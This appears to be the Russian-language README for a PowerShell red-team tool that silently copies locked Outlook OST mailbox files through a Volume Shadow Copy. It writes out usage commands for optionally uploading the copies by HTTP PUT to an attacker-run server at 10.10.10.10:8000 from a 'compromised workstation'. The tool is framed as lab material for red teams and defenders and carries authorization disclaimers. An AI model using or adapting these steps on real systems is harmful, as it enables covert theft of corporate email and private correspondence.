Powershell-инструмент для съёма ost без остановки outlook через shadow copy. Учебный сценарий для Red Team, SOC и DFIR: поиск ящиков, vss-снимок, копирование ost и (опционально) эксфильтрация по HTTP. Использовать только в своих лабораториях и в рамках авторизованных тестов с письменным разрешением владельца инфраструктуры.
Лабораторный инструмент для тихого съёма Outlook OST-файлов через Volume Shadow Copy на Windows.
Цель инструмента — показать, что при наличии прав локального администратора на рабочей станции атакующий может:
- создать теневую копию тома (VSS),
- незаметно скопировать OST-файлы Outlook, не останавливая сам Outlook и не трогая залоченный файл,
- при необходимости выгрузить копии OST на внешний веб сервер методом
PUT, - разобрать содержимое почты уже оффлайн, на своём хосте.
Это не инструмент для «ломать домены»:
он не трогает LSASS, не делает DCSync и не работает с паролями домена.
Задача — показать тихую эксфильтрацию корпоративной переписки и дать материал для
Red Team, SOC и DFIR.
Внимание: использовать только в своих лабораториях и в рамках авторизованных тестов с письменным разрешением владельца инфраструктуры.
- Поиск всех файлов
*.ostподC:\Users\*\AppData\Local\Microsoft\Outlook\. - Создание одной Volume Shadow Copy для указанного тома (по умолчанию
C:\). - Монтирование shadow copy в каталог через
mklink /d(без прямой работы сGLOBALROOT). - Копирование каждого найденного OST из снапшота в артефакт-директорию:
C:\LabArtifacts\OST\<HOST>\<User>\<MailboxFile>.ost.ost2. - Опциональная загрузка OST-копий на внешний HTTP-сервер методом
PUT. - Автоматическая очистка: удаление mount-папки и shadow copy (если не включён
-KeepShadow).
На сервере атакующего разворачиваем веб-сервер
python put_server.py --host 0.0.0.0 --port 8000 --outdir ./uploadsНа скомпроментированной рабочей станции под управлением Windows
$headers = @{ 'X-RT-Token' = 'lab-demo' }
Copy-OstFromTheShadowCopy `
-DestinationRoot 'C:\LabArtifacts\OST' `
-UploadUrl 'http://10.10.10.10:8000' `
-UploadHeaders $headersCopy-OstFromTheShadowCopy/
├─ Copy-OstFromTheShadowCopy.ps1 # основной скрипт PowerShell
├─ put_server.py # минимальный HTTP PUT-ресивер на Python